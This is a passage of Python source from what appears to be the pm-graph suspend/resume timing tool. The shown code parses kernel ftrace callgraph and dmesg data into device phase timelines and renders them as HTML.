phaselist = self.dmesg[phase]['list']
for devname in phaselist:
dev = phaselist[devname]
if(dev['end'] < 0):
for p in self.sortedPhases():
if self.dmesg[p]['end'] > dev['start']:
dev['end'] = self.dmesg[p]['end']
break
sysvals.vprint('%s (%s): callback didnt return' % (devname, phase))
def deviceFilter(self, devicefilter):
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
rmlist = []
for name in list:
keep = False
for filter in devicefilter:
if filter in name or \
('drv' in list[name] and filter in list[name]['drv']):
keep = True
if not keep:
rmlist.append(name)
for name in rmlist:
del list[name]
def fixupInitcallsThatDidntReturn(self):
# if any calls never returned, clip them at system resume end
for phase in self.sortedPhases():
self.fixupInitcalls(phase)
def phaseOverlap(self, phases):
rmgroups = []
newgroup = []
for group in self.devicegroups:
for phase in phases:
if phase not in group:
continue
for p in group:
if p not in newgroup:
newgroup.append(p)
if group not in rmgroups:
rmgroups.append(group)
for group in rmgroups:
self.devicegroups.remove(group)
self.devicegroups.append(newgroup)
def newActionGlobal(self, name, start, end, pid=-1, color=''):
# which phase is this device callback or action in
phases = self.sortedPhases()
targetphase = 'none'
htmlclass = ''
overlap = 0.0
myphases = []
for phase in phases:
pstart = self.dmesg[phase]['start']
pend = self.dmesg[phase]['end']
# see if the action overlaps this phase
o = max(0, min(end, pend) - max(start, pstart))
if o > 0:
myphases.append(phase)
# set the target phase to the one that overlaps most
if o > overlap:
if overlap > 0 and phase == 'post_resume':
continue
targetphase = phase
overlap = o
# if no target phase was found, pin it to the edge
if targetphase == 'none':
p0start = self.dmesg[phases[0]]['start']
if start <= p0start:
targetphase = phases[0]
else:
targetphase = phases[-1]
if pid == -2:
htmlclass = ' bg'
elif pid == -3:
htmlclass = ' ps'
if len(myphases) > 1:
htmlclass = ' bg'
self.phaseOverlap(myphases)
if targetphase in phases:
newname = self.newAction(targetphase, name, pid, '', start, end, '', htmlclass, color)
return (targetphase, newname)
return False
def newAction(self, phase, name, pid, parent, start, end, drv, htmlclass='', color=''):
# new device callback for a specific phase
self.html_device_id += 1
devid = '%s%d' % (self.idstr, self.html_device_id)
list = self.dmesg[phase]['list']
length = -1.0
if(start >= 0 and end >= 0):
length = end - start
if pid == -2 or name not in sysvals.tracefuncs.keys():
i = 2
origname = name
while(name in list):
name = '%s[%d]' % (origname, i)
i += 1
list[name] = {'name': name, 'start': start, 'end': end, 'pid': pid,
'par': parent, 'length': length, 'row': 0, 'id': devid, 'drv': drv }
if htmlclass:
list[name]['htmlclass'] = htmlclass
if color:
list[name]['color'] = color
return name
def findDevice(self, phase, name):
list = self.dmesg[phase]['list']
mydev = ''
for devname in sorted(list):
if name == devname or re.match('^%s\[(?P<num>[0-9]*)\]$' % name, devname):
mydev = devname
if mydev:
return list[mydev]
return False
def deviceChildren(self, devname, phase):
devlist = []
list = self.dmesg[phase]['list']
for child in list:
if(list[child]['par'] == devname):
devlist.append(child)
return devlist
def maxDeviceNameSize(self, phase):
size = 0
for name in self.dmesg[phase]['list']:
if len(name) > size:
size = len(name)
return size
def printDetails(self):
sysvals.vprint('Timeline Details:')
sysvals.vprint(' test start: %f' % self.start)
sysvals.vprint('kernel suspend start: %f' % self.tKernSus)
tS = tR = False
for phase in self.sortedPhases():
devlist = self.dmesg[phase]['list']
dc, ps, pe = len(devlist), self.dmesg[phase]['start'], self.dmesg[phase]['end']
if not tS and ps >= self.tSuspended:
sysvals.vprint(' machine suspended: %f' % self.tSuspended)
tS = True
if not tR and ps >= self.tResumed:
sysvals.vprint(' machine resumed: %f' % self.tResumed)
tR = True
sysvals.vprint('%20s: %f - %f (%d devices)' % (phase, ps, pe, dc))
if sysvals.devdump:
sysvals.vprint(''.join('-' for i in range(80)))
maxname = '%d' % self.maxDeviceNameSize(phase)
fmt = '%3d) %'+maxname+'s - %f - %f'
c = 1
for name in sorted(devlist):
s = devlist[name]['start']
e = devlist[name]['end']
sysvals.vprint(fmt % (c, name, s, e))
c += 1
sysvals.vprint(''.join('-' for i in range(80)))
sysvals.vprint(' kernel resume end: %f' % self.tKernRes)
sysvals.vprint(' test end: %f' % self.end)
def deviceChildrenAllPhases(self, devname):
devlist = []
for phase in self.sortedPhases():
list = self.deviceChildren(devname, phase)
for dev in sorted(list):
if dev not in devlist:
devlist.append(dev)
return devlist
def masterTopology(self, name, list, depth):
node = DeviceNode(name, depth)
for cname in list:
# avoid recursions
if name == cname:
continue
clist = self.deviceChildrenAllPhases(cname)
cnode = self.masterTopology(cname, clist, depth+1)
node.children.append(cnode)
return node
def printTopology(self, node):
html = ''
if node.name:
info = ''
drv = ''
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
if node.name in list:
s = list[node.name]['start']
e = list[node.name]['end']
if list[node.name]['drv']:
drv = ' {'+list[node.name]['drv']+'}'
info += ('<li>%s: %.3fms</li>' % (phase, (e-s)*1000))
html += '<li><b>'+node.name+drv+'</b>'
if info:
html += '<ul>'+info+'</ul>'
html += '</li>'
if len(node.children) > 0:
html += '<ul>'
for cnode in node.children:
html += self.printTopology(cnode)
html += '</ul>'
return html
def rootDeviceList(self):
# list of devices graphed
real = []
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
for dev in sorted(list):
if list[dev]['pid'] >= 0 and dev not in real:
real.append(dev)
# list of top-most root devices
rootlist = []
for phase in self.sortedPhases():
list = self.dmesg[phase]['list']
for dev in sorted(list):
pdev = list[dev]['par']
pid = list[dev]['pid']
if(pid < 0 or re.match('[0-9]*-[0-9]*\.[0-9]*[\.0-9]*\:[\.0-9]*$', pdev)):
continue
if pdev and pdev not in real and pdev not in rootlist:
rootlist.append(pdev)
return rootlist
def deviceTopology(self):
rootlist = self.rootDeviceList()
master = self.masterTopology('', rootlist, 0)
return self.printTopology(master)
def selectTimelineDevices(self, widfmt, tTotal, mindevlen):
# only select devices that will actually show up in html
self.tdevlist = dict()
for phase in self.dmesg:
devlist = []
list = self.dmesg[phase]['list']
for dev in list:
length = (list[dev]['end'] - list[dev]['start']) * 1000
width = widfmt % (((list[dev]['end']-list[dev]['start'])*100)/tTotal)
if length >= mindevlen:
devlist.append(dev)
self.tdevlist[phase] = devlist
def addHorizontalDivider(self, devname, devend):
phase = 'suspend_prepare'
self.newAction(phase, devname, -2, '', \
self.start, devend, '', ' sec', '')
if phase not in self.tdevlist:
self.tdevlist[phase] = []
self.tdevlist[phase].append(devname)
d = DevItem(0, phase, self.dmesg[phase]['list'][devname])
return d
def addProcessUsageEvent(self, name, times):
# get the start and end times for this process
maxC = 0
tlast = 0
start = -1
end = -1
for t in sorted(times):
if tlast == 0:
tlast = t
continue
if name in self.pstl[t]:
if start == -1 or tlast < start:
start = tlast
if end == -1 or t > end:
end = t
tlast = t
if start == -1 or end == -1:
return 0
# add a new action for this process and get the object
out = self.newActionGlobal(name, start, end, -3)
if not out:
return 0
phase, devname = out
dev = self.dmesg[phase]['list'][devname]
# get the cpu exec data
tlast = 0
clast = 0
cpuexec = dict()
for t in sorted(times):
if tlast == 0 or t <= start or t > end:
tlast = t
continue
list = self.pstl[t]
c = 0
if name in list:
c = list[name]
if c > maxC:
maxC = c
if c != clast:
key = (tlast, t)
cpuexec[key] = c
tlast = t
clast = c
dev['cpuexec'] = cpuexec
return maxC
def createProcessUsageEvents(self):
# get an array of process names
proclist = []
for t in sorted(self.pstl):
pslist = self.pstl[t]
for ps in sorted(pslist):
if ps not in proclist:
proclist.append(ps)
# get a list of data points for suspend and resume
tsus = []
tres = []
for t in sorted(self.pstl):
if t < self.tSuspended:
tsus.append(t)
else:
tres.append(t)
# process the events for suspend and resume
if len(proclist) > 0:
sysvals.vprint('Process Execution:')
for ps in proclist:
c = self.addProcessUsageEvent(ps, tsus)
if c > 0:
sysvals.vprint('%25s (sus): %d' % (ps, c))
c = self.addProcessUsageEvent(ps, tres)
if c > 0:
sysvals.vprint('%25s (res): %d' % (ps, c))
def handleEndMarker(self, time, msg=''):
dm = self.dmesg
self.setEnd(time, msg)
self.initDevicegroups()
# give suspend_prepare an end if needed
if 'suspend_prepare' in dm and dm['suspend_prepare']['end'] < 0:
dm['suspend_prepare']['end'] = time
# assume resume machine ends at next phase start
if 'resume_machine' in dm and dm['resume_machine']['end'] < 0:
np = self.nextPhase('resume_machine', 1)
if np:
dm['resume_machine']['end'] = dm[np]['start']
# if kernel resume end not found, assume its the end marker
if self.tKernRes == 0.0:
self.tKernRes = time
# if kernel suspend start not found, assume its the end marker
if self.tKernSus == 0.0:
self.tKernSus = time
# set resume complete to end at end marker
if 'resume_complete' in dm:
dm['resume_complete']['end'] = time
def debugPrint(self):
for p in self.sortedPhases():
list = self.dmesg[p]['list']
for devname in sorted(list):
dev = list[devname]
if 'ftrace' in dev:
dev['ftrace'].debugPrint(' [%s]' % devname)
# Class: DevFunction
# Description:
# A container for kprobe function data we want in the dev timeline
class DevFunction:
def __init__(self, name, args, caller, ret, start, end, u, proc, pid, color):
self.row = 0
self.count = 1
self.name = name
self.args = args
self.caller = caller
self.ret = ret
self.time = start
self.length = end - start
self.end = end
self.ubiquitous = u
self.proc = proc
self.pid = pid
self.color = color
def title(self):
cnt = ''
if self.count > 1:
cnt = '(x%d)' % self.count
l = '%0.3fms' % (self.length * 1000)
if self.ubiquitous:
title = '%s(%s)%s <- %s, %s(%s)' % \
(self.name, self.args, cnt, self.caller, self.ret, l)
else:
title = '%s(%s) %s%s(%s)' % (self.name, self.args, self.ret, cnt, l)
return title.replace('"', '')
def text(self):
if self.count > 1:
text = '%s(x%d)' % (self.name, self.count)
else:
text = self.name
return text
def repeat(self, tgt):
# is the tgt call just a repeat of this call (e.g. are we in a loop)
dt = self.time - tgt.end
# only combine calls if -all- attributes are identical
if tgt.caller == self.caller and \
tgt.name == self.name and tgt.args == self.args and \
tgt.proc == self.proc and tgt.pid == self.pid and \
tgt.ret == self.ret and dt >= 0 and \
dt <= sysvals.callloopmaxgap and \
self.length < sysvals.callloopmaxlen:
return True
return False
# Class: FTraceLine
# Description:
# A container for a single line of ftrace data. There are six basic types:
# callgraph line:
# call: " dpm_run_callback() {"
# return: " }"
# leaf: " dpm_run_callback();"
# trace event:
# tracing_mark_write: SUSPEND START or RESUME COMPLETE
# suspend_resume: phase or custom exec block data
# device_pm_callback: device callback info
class FTraceLine:
def __init__(self, t, m='', d=''):
self.length = 0.0
self.fcall = False
self.freturn = False
self.fevent = False
self.fkprobe = False
self.depth = 0
self.name = ''
self.type = ''
self.time = float(t)
if not m and not d:
return
# is this a trace event
if(d == 'traceevent' or re.match('^ *\/\* *(?P<msg>.*) \*\/ *$', m)):
if(d == 'traceevent'):
# nop format trace event
msg = m
else:
# function_graph format trace event
em = re.match('^ *\/\* *(?P<msg>.*) \*\/ *$', m)
msg = em.group('msg')
emm = re.match('^(?P<call>.*?): (?P<msg>.*)', msg)
if(emm):
self.name = emm.group('msg')
self.type = emm.group('call')
else:
self.name = msg
km = re.match('^(?P<n>.*)_cal$', self.type)
if km:
self.fcall = True
self.fkprobe = True
self.type = km.group('n')
return
km = re.match('^(?P<n>.*)_ret$', self.type)
if km:
self.freturn = True
self.fkprobe = True
self.type = km.group('n')
return
self.fevent = True
return
# convert the duration to seconds
if(d):
self.length = float(d)/1000000
# the indentation determines the depth
match = re.match('^(?P<d> *)(?P<o>.*)$', m)
if(not match):
return
self.depth = self.getDepth(match.group('d'))
m = match.group('o')
# function return
if(m[0] == '}'):
self.freturn = True
if(len(m) > 1):
# includes comment with function name
match = re.match('^} *\/\* *(?P<n>.*) *\*\/$', m)
if(match):
self.name = match.group('n').strip()
# function call
else:
self.fcall = True
# function call with children
if(m[-1] == '{'):
match = re.match('^(?P<n>.*) *\(.*', m)
if(match):
self.name = match.group('n').strip()
# function call with no children (leaf)
elif(m[-1] == ';'):
self.freturn = True
match = re.match('^(?P<n>.*) *\(.*', m)
if(match):
self.name = match.group('n').strip()
# something else (possibly a trace marker)
else:
self.name = m
def isCall(self):
return self.fcall and not self.freturn
def isReturn(self):
return self.freturn and not self.fcall
def isLeaf(self):
return self.fcall and self.freturn
def getDepth(self, str):
return len(str)/2
def debugPrint(self, info=''):
if self.isLeaf():
pprint(' -- %12.6f (depth=%02d): %s(); (%.3f us) %s' % (self.time, \
self.depth, self.name, self.length*1000000, info))
elif self.freturn:
pprint(' -- %12.6f (depth=%02d): %s} (%.3f us) %s' % (self.time, \
self.depth, self.name, self.length*1000000, info))
else:
pprint(' -- %12.6f (depth=%02d): %s() { (%.3f us) %s' % (self.time, \
self.depth, self.name, self.length*1000000, info))
def startMarker(self):
# Is this the starting line of a suspend?
if not self.fevent:
return False
if sysvals.usetracemarkers:
if(self.name.startswith('SUSPEND START')):
return True
return False
else:
if(self.type == 'suspend_resume' and
re.match('suspend_enter\[.*\] begin', self.name)):
return True
return False
def endMarker(self):
# Is this the ending line of a resume?
if not self.fevent:
return False
if sysvals.usetracemarkers:
if(self.name.startswith('RESUME COMPLETE')):
return True
return False
else:
if(self.type == 'suspend_resume' and
re.match('thaw_processes\[.*\] end', self.name)):
return True
return False
# Class: FTraceCallGraph
# Description:
# A container for the ftrace callgraph of a single recursive function.
# This can be a dpm_run_callback, dpm_prepare, or dpm_complete callgraph
# Each instance is tied to a single device in a single phase, and is
# comprised of an ordered list of FTraceLine objects
class FTraceCallGraph:
vfname = 'missing_function_name'
def __init__(self, pid, sv):
self.id = ''
self.invalid = False
self.name = ''
self.partial = False
self.ignore = False
self.start = -1.0
self.end = -1.0
self.list = []
self.depth = 0
self.pid = pid
self.sv = sv
def addLine(self, line):
# if this is already invalid, just leave
if(self.invalid):
if(line.depth == 0 and line.freturn):
return 1
return 0
# invalidate on bad depth
if(self.depth < 0):
self.invalidate(line)
return 0
# ignore data til we return to the current depth
if self.ignore:
if line.depth > self.depth:
return 0
else:
self.list[-1].freturn = True
self.list[-1].length = line.time - self.list[-1].time
self.ignore = False
# if this is a return at self.depth, no more work is needed
if line.depth == self.depth and line.isReturn():
if line.depth == 0:
self.end = line.time
return 1
return 0
# compare current depth with this lines pre-call depth
prelinedep = line.depth
if line.isReturn():
prelinedep += 1
last = 0
lasttime = line.time
if len(self.list) > 0:
last = self.list[-1]
lasttime = last.time
if last.isLeaf():
lasttime += last.length
# handle low misalignments by inserting returns
mismatch = prelinedep - self.depth
warning = self.sv.verbose and abs(mismatch) > 1
info = []
if mismatch < 0:
idx = 0
# add return calls to get the depth down
while prelinedep < self.depth:
self.depth -= 1
if idx == 0 and last and last.isCall():
# special case, turn last call into a leaf
last.depth = self.depth
last.freturn = True
last.length = line.time - last.time
if warning:
info.append(('[make leaf]', last))
else:
vline = FTraceLine(lasttime)
vline.depth = self.depth
vline.name = self.vfname
vline.freturn = True
self.list.append(vline)
if warning:
if idx == 0:
info.append(('', last))
info.append(('[add return]', vline))
idx += 1
if warning:
info.append(('', line))
# handle high misalignments by inserting calls
elif mismatch > 0:
idx = 0
if warning:
info.append(('', last))
# add calls to get the depth up
while prelinedep > self.depth:
if idx == 0 and line.isReturn():
# special case, turn this return into a leaf
line.fcall = True
prelinedep -= 1
if warning:
info.append(('[make leaf]', line))
else:
vline = FTraceLine(lasttime)
vline.depth = self.depth
vline.name = self.vfname
vline.fcall = True
self.list.append(vline)
self.depth += 1
if not last:
self.start = vline.time
if warning:
info.append(('[add call]', vline))
idx += 1
if warning and ('[make leaf]', line) not in info:
info.append(('', line))
if warning:
pprint('WARNING: ftrace data missing, corrections made:')
for i in info:
t, obj = i
if obj:
obj.debugPrint(t)
# process the call and set the new depth
skipadd = False
md = self.sv.max_graph_depth
if line.isCall():
# ignore blacklisted/overdepth funcs
if (md and self.depth >= md - 1) or (line.name in self.sv.cgblacklist):
self.ignore = True
else:
self.depth += 1
elif line.isReturn():
self.depth -= 1
# remove blacklisted/overdepth/empty funcs that slipped through
if (last and last.isCall() and last.depth == line.depth) or \
(md and last and last.depth >= md) or \
(line.name in self.sv.cgblacklist):
while len(self.list) > 0 and self.list[-1].depth > line.depth:
self.list.pop(-1)
if len(self.list) == 0:
self.invalid = True
return 1
self.list[-1].freturn = True
self.list[-1].length = line.time - self.list[-1].time
self.list[-1].name = line.name
skipadd = True
if len(self.list) < 1:
self.start = line.time
# check for a mismatch that returned all the way to callgraph end
res = 1
if mismatch < 0 and self.list[-1].depth == 0 and self.list[-1].freturn:
line = self.list[-1]
skipadd = True
res = -1
if not skipadd:
self.list.append(line)
if(line.depth == 0 and line.freturn):
if(self.start < 0):
self.start = line.time
self.end = line.time
if line.fcall:
self.end += line.length
if self.list[0].name == self.vfname:
self.invalid = True
if res == -1:
self.partial = True
return res
return 0
def invalidate(self, line):
if(len(self.list) > 0):
first = self.list[0]
self.list = []
self.list.append(first)
self.invalid = True
id = 'task %s' % (self.pid)
window = '(%f - %f)' % (self.start, line.time)
if(self.depth < 0):
pprint('Data misalignment for '+id+\
' (buffer overflow), ignoring this callback')
else:
pprint('Too much data for '+id+\
' '+window+', ignoring this callback')
def slice(self, dev):
minicg = FTraceCallGraph(dev['pid'], self.sv)
minicg.name = self.name
mydepth = -1
good = False
for l in self.list:
if(l.time < dev['start'] or l.time > dev['end']):
continue
if mydepth < 0:
if l.name == 'mutex_lock' and l.freturn:
mydepth = l.depth
continue
elif l.depth == mydepth and l.name == 'mutex_unlock' and l.fcall:
good = True
break
l.depth -= mydepth
minicg.addLine(l)
if not good or len(minicg.list) < 1:
return 0
return minicg
def repair(self, enddepth):
# bring the depth back to 0 with additional returns
fixed = False
last = self.list[-1]
for i in reversed(range(enddepth)):
t = FTraceLine(last.time)
t.depth = i
t.freturn = True
fixed = self.addLine(t)
if fixed != 0:
self.end = last.time
return True
return False
def postProcess(self):
if len(self.list) > 0:
self.name = self.list[0].name
stack = dict()
cnt = 0
last = 0
for l in self.list:
# ftrace bug: reported duration is not reliable
# check each leaf and clip it at max possible length
if last and last.isLeaf():
if last.length > l.time - last.time:
last.length = l.time - last.time
if l.isCall():
stack[l.depth] = l
cnt += 1
elif l.isReturn():
if(l.depth not in stack):
if self.sv.verbose:
pprint('Post Process Error: Depth missing')
l.debugPrint()
return False
# calculate call length from call/return lines
cl = stack[l.depth]
cl.length = l.time - cl.time
if cl.name == self.vfname:
cl.name = l.name
stack.pop(l.depth)
l.length = 0
cnt -= 1
last = l
if(cnt == 0):
# trace caught the whole call tree
return True
elif(cnt < 0):
if self.sv.verbose:
pprint('Post Process Error: Depth is less than 0')
return False
# trace ended before call tree finished
return self.repair(cnt)
def deviceMatch(self, pid, data):
found = ''
# add the callgraph data to the device hierarchy
borderphase = {
'dpm_prepare': 'suspend_prepare',
'dpm_complete': 'resume_complete'
}
if(self.name in borderphase):
p = borderphase[self.name]
list = data.dmesg[p]['list']
for devname in list:
dev = list[devname]
if(pid == dev['pid'] and
self.start <= dev['start'] and
self.end >= dev['end']):
cg = self.slice(dev)
if cg:
dev['ftrace'] = cg
found = devname
return found
for p in data.sortedPhases():
if(data.dmesg[p]['start'] <= self.start and
self.start <= data.dmesg[p]['end']):
list = data.dmesg[p]['list']
for devname in sorted(list, key=lambda k:list[k]['start']):
dev = list[devname]
if(pid == dev['pid'] and
self.start <= dev['start'] and
self.end >= dev['end']):
dev['ftrace'] = self
found = devname
break
break
return found
def newActionFromFunction(self, data):
name = self.name
if name in ['dpm_run_callback', 'dpm_prepare', 'dpm_complete']:
return
fs = self.start
fe = self.end
if fs < data.start or fe > data.end:
return
phase = ''
for p in data.sortedPhases():
if(data.dmesg[p]['start'] <= self.start and
self.start < data.dmesg[p]['end']):
phase = p
break
if not phase:
return
out = data.newActionGlobal(name, fs, fe, -2)
if out:
phase, myname = out
data.dmesg[phase]['list'][myname]['ftrace'] = self
def debugPrint(self, info=''):
pprint('%s pid=%d [%f - %f] %.3f us' % \
(self.name, self.pid, self.start, self.end,
(self.end - self.start)*1000000))
for l in self.list:
if l.isLeaf():
pprint('%f (%02d): %s(); (%.3f us)%s' % (l.time, \
l.depth, l.name, l.length*1000000, info))
elif l.freturn:
pprint('%f (%02d): %s} (%.3f us)%s' % (l.time, \
l.depth, l.name, l.length*1000000, info))
else:
pprint('%f (%02d): %s() { (%.3f us)%s' % (l.time, \
l.depth, l.name, l.length*1000000, info))
pprint(' ')
class DevItem:
def __init__(self, test, phase, dev):
self.test = test
self.phase = phase
self.dev = dev
def isa(self, cls):
if 'htmlclass' in self.dev and cls in self.dev['htmlclass']:
return True
return False
# Class: Timeline
# Description:
# A container for a device timeline which calculates
# all the html properties to display it correctly
class Timeline:
html_tblock = '<div id="block{0}" class="tblock" style="left:{1}%;width:{2}%;"><div class="tback" style="height:{3}px"></div>\n'
html_device = '<div id="{0}" title="{1}" class="thread{7}" style="left:{2}%;top:{3}px;height:{4}px;width:{5}%;{8}">{6}</div>\n'
html_phase = '<div class="phase" style="left:{0}%;width:{1}%;top:{2}px;height:{3}px;background:{4}">{5}</div>\n'
html_phaselet = '<div id="{0}" class="phaselet" style="left:{1}%;width:{2}%;background:{3}"></div>\n'
html_legend = '<div id="p{3}" class="square" style="left:{0}%;background:{1}"> {2}</div>\n'
def __init__(self, rowheight, scaleheight):
self.html = ''
self.height = 0 # total timeline height
self.scaleH = scaleheight # timescale (top) row height
self.rowH = rowheight # device row height
self.bodyH = 0 # body height
self.rows = 0 # total timeline rows
self.rowlines = dict()
self.rowheight = dict()
def createHeader(self, sv, stamp):
if(not stamp['time']):
return
self.html += '<div class="version"><a href="https://01.org/pm-graph">%s v%s</a></div>' \
% (sv.title, sv.version)
if sv.logmsg and sv.testlog:
self.html += '<button id="showtest" class="logbtn btnfmt">log</button>'
if sv.dmesglog:
self.html += '<button id="showdmesg" class="logbtn btnfmt">dmesg</button>'
if sv.ftracelog:
self.html += '<button id="showftrace" class="logbtn btnfmt">ftrace</button>'
headline_stamp = '<div class="stamp">{0} {1} {2} {3}</div>\n'
self.html += headline_stamp.format(stamp['host'], stamp['kernel'],
stamp['mode'], stamp['time'])
if 'man' in stamp and 'plat' in stamp and 'cpu' in stamp and \
stamp['man'] and stamp['plat'] and stamp['cpu']:
headline_sysinfo = '<div class="stamp sysinfo">{0} {1} <i>with</i> {2}</div>\n'
self.html += headline_sysinfo.format(stamp['man'], stamp['plat'], stamp['cpu'])
# Function: getDeviceRows
# Description:
# determine how may rows the device funcs will take
# Arguments:
# rawlist: the list of devices/actions for a single phase
# Output:
# The total number of rows needed to display this phase of the timeline
def getDeviceRows(self, rawlist):
# clear all rows and set them to undefined
sortdict = dict()
for item in rawlist:
item.row = -1
sortdict[item] = item.length
sortlist = sorted(sortdict, key=sortdict.get, reverse=True)
remaining = len(sortlist)
rowdata = dict()
row = 1
# try to pack each row with as many ranges as possible
while(remaining > 0):
if(row not in rowdata):
rowdata[row] = []
for i in sortlist:
if(i.row >= 0):
continue
s = i.time
e = i.time + i.length
valid = True
for ritem in rowdata[row]:
rs = ritem.time
re = ritem.time + ritem.length
if(not (((s <= rs) and (e <= rs)) or
((s >= re) and (e >= re)))):
valid = False
break
if(valid):
rowdata[row].append(i)
i.row = row
remaining -= 1
row += 1
return row
# Function: getPhaseRows
# Description:
# Organize the timeline entries into the smallest
# number of rows possible, with no entry overlapping
# Arguments:
# devlist: the list of devices/actions in a group of contiguous phases
# Output:
# The total number of rows needed to display this phase of the timeline
def getPhaseRows(self, devlist, row=0, sortby='length'):
# clear all rows and set them to undefined
remaining = len(devlist)
rowdata = dict()
sortdict = dict()
myphases = []
# initialize all device rows to -1 and calculate devrows
for item in devlist:
dev = item.dev
tp = (item.test, item.phase)
if tp not in myphases:
myphases.append(tp)
dev['row'] = -1
if sortby == 'start':
# sort by start 1st, then length 2nd
sortdict[item] = (-1*float(dev['start']), float(dev['end']) - float(dev['start']))
else:
# sort by length 1st, then name 2nd
sortdict[item] = (float(dev['end']) - float(dev['start']), item.dev['name'])
if 'src' in dev:
dev['devrows'] = self.getDeviceRows(dev['src'])
# sort the devlist by length so that large items graph on top
sortlist = sorted(sortdict, key=sortdict.get, reverse=True)
orderedlist = []
for item in sortlist:
if item.dev['pid'] == -2:
orderedlist.append(item)
for item in sortlist:
if item not in orderedlist:
orderedlist.append(item)
# try to pack each row with as many devices as possible
while(remaining > 0):
rowheight = 1
if(row not in rowdata):
rowdata[row] = []
for item in orderedlist:
dev = item.dev
if(dev['row'] < 0):
s = dev['start']
e = dev['end']
valid = True
for ritem in rowdata[row]:
rs = ritem.dev['start']
re = ritem.dev['end']
if(not (((s <= rs) and (e <= rs)) or
((s >= re) and (e >= re)))):
valid = False
break
if(valid):
rowdata[row].append(item)
dev['row'] = row
remaining -= 1
if 'devrows' in dev and dev['devrows'] > rowheight:
rowheight = dev['devrows']
for t, p in myphases:
if t not in self.rowlines or t not in self.rowheight:
self.rowlines[t] = dict()
self.rowheight[t] = dict()
if p not in self.rowlines[t] or p not in self.rowheight[t]:
self.rowlines[t][p] = dict()
self.rowheight[t][p] = dict()
rh = self.rowH
# section headers should use a different row height
if len(rowdata[row]) == 1 and \
'htmlclass' in rowdata[row][0].dev and \
'sec' in rowdata[row][0].dev['htmlclass']:
rh = 15
self.rowlines[t][p][row] = rowheight
self.rowheight[t][p][row] = rowheight * rh
row += 1
if(row > self.rows):
self.rows = int(row)
return row
def phaseRowHeight(self, test, phase, row):
return self.rowheight[test][phase][row]
def phaseRowTop(self, test, phase, row):
top = 0
for i in sorted(self.rowheight[test][phase]):
if i >= row:
break
top += self.rowheight[test][phase][i]
return top
def calcTotalRows(self):
# Calculate the heights and offsets for the header and rows
maxrows = 0
standardphases = []
for t in self.rowlines:
for p in self.rowlines[t]:
total = 0
for i in sorted(self.rowlines[t][p]):
total += self.rowlines[t][p][i]
if total > maxrows:
maxrows = total
if total == len(self.rowlines[t][p]):
standardphases.append((t, p))
self.height = self.scaleH + (maxrows*self.rowH)
self.bodyH = self.height - self.scaleH
# if there is 1 line per row, draw them the standard way
for t, p in standardphases:
for i in sorted(self.rowheight[t][p]):
self.rowheight[t][p][i] = float(self.bodyH)/len(self.rowlines[t][p])
def createZoomBox(self, mode='command', testcount=1):
# Create bounding box, add buttons
html_zoombox = '<center><button id="zoomin">ZOOM IN +</button><button id="zoomout">ZOOM OUT -</button><button id="zoomdef">ZOOM 1:1</button></center>\n'
html_timeline = '<div id="dmesgzoombox" class="zoombox">\n<div id="{0}" class="timeline" style="height:{1}px">\n'
html_devlist1 = '<button id="devlist1" class="devlist" style="float:left;">Device Detail{0}</button>'
html_devlist2 = '<button id="devlist2" class="devlist" style="float:right;">Device Detail2</button>\n'
if mode != 'command':
if testcount > 1:
self.html += html_devlist2
self.html += html_devlist1.format('1')
else:
self.html += html_devlist1.format('')
self.html += html_zoombox
self.html += html_timeline.format('dmesg', self.height)
# Function: createTimeScale
# Description:
# Create the timescale for a timeline block
# Arguments:
# m0: start time (mode begin)
# mMax: end time (mode end)
# tTotal: total timeline time
# mode: suspend or resume
# Output:
# The html code needed to display the time scale
def createTimeScale(self, m0, mMax, tTotal, mode):
timescale = '<div class="t" style="right:{0}%">{1}</div>\n'
rline = '<div class="t" style="left:0;border-left:1px solid black;border-right:0;">{0}</div>\n'
output = '<div class="timescale">\n'
# set scale for timeline
mTotal = mMax - m0
tS = 0.1
if(tTotal <= 0):
return output+'</div>\n'
if(tTotal > 4):
tS = 1
divTotal = int(mTotal/tS) + 1
divEdge = (mTotal - tS*(divTotal-1))*100/mTotal
for i in range(divTotal):
htmlline = ''
if(mode == 'suspend'):
pos = '%0.3f' % (100 - ((float(i)*tS*100)/mTotal) - divEdge)
val = '%0.fms' % (float(i-divTotal+1)*tS*1000)
if(i == divTotal - 1):
val = mode
htmlline = timescale.format(pos, val)
else:
pos = '%0.3f' % (100 - ((float(i)*tS*100)/mTotal))
val = '%0.fms' % (float(i)*tS*1000)
htmlline = timescale.format(pos, val)
if(i == 0):
htmlline = rline.format(mode)
output += htmlline
self.html += output+'</div>\n'
# Class: TestProps
# Description:
# A list of values describing the properties of these test runs
class TestProps:
stampfmt = '# [a-z]*-(?P<m>[0-9]{2})(?P<d>[0-9]{2})(?P<y>[0-9]{2})-'+\
'(?P<H>[0-9]{2})(?P<M>[0-9]{2})(?P<S>[0-9]{2})'+\
' (?P<host>.*) (?P<mode>.*) (?P<kernel>.*)$'
wififmt = '^# wifi *(?P<d>\S*) *(?P<s>\S*) *(?P<t>[0-9\.]+).*'
tstatfmt = '^# turbostat (?P<t>\S*)'
testerrfmt = '^# enter_sleep_error (?P<e>.*)'
sysinfofmt = '^# sysinfo .*'
cmdlinefmt = '^# command \| (?P<cmd>.*)'
kparamsfmt = '^# kparams \| (?P<kp>.*)'
devpropfmt = '# Device Properties: .*'
pinfofmt = '# platform-(?P<val>[a-z,A-Z,0-9]*): (?P<info>.*)'
tracertypefmt = '# tracer: (?P<t>.*)'
firmwarefmt = '# fwsuspend (?P<s>[0-9]*) fwresume (?P<r>[0-9]*)$'
procexecfmt = 'ps - (?P<ps>.*)$'
ftrace_line_fmt_fg = \
'^ *(?P<time>[0-9\.]*) *\| *(?P<cpu>[0-9]*)\)'+\
' *(?P<proc>.*)-(?P<pid>[0-9]*) *\|'+\
'[ +!#\*@$]*(?P<dur>[0-9\.]*) .*\| (?P<msg>.*)'
ftrace_line_fmt_nop = \
' *(?P<proc>.*)-(?P<pid>[0-9]*) *\[(?P<cpu>[0-9]*)\] *'+\
'(?P<flags>\S*) *(?P<time>[0-9\.]*): *'+\
'(?P<msg>.*)'
machinesuspend = 'machine_suspend\[.*'
def __init__(self):
self.stamp = ''
self.sysinfo = ''
self.cmdline = ''
self.testerror = []
self.turbostat = []
self.wifi = []
self.fwdata = []
self.ftrace_line_fmt = self.ftrace_line_fmt_nop
self.cgformat = False
self.data = 0
self.ktemp = dict()
def setTracerType(self, tracer):
if(tracer == 'function_graph'):
self.cgformat = True
